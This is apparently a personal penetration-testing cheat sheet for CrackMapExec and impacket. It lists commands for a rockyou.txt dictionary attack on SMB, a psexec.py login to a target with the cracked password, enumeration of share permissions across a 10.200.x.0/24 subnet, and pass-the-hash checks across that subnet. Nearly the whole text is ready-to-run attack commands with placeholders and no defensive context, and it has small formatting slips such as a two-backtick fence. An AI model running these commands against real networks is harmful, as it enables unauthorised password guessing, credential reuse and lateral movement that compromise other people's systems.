# Crackmapexec

* Dictionary attack against SMB
```sh 
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```
* Use the password with `impacket/examples/psexec.py` in the following way
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```

## Shares

* Check user permissions on shares
``sh
crackmapexec  smb 10.200.x.0/24 -u <user> -p <password> --shares
```

## SMB
* Check user hash on the network via smb
```sh
 crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```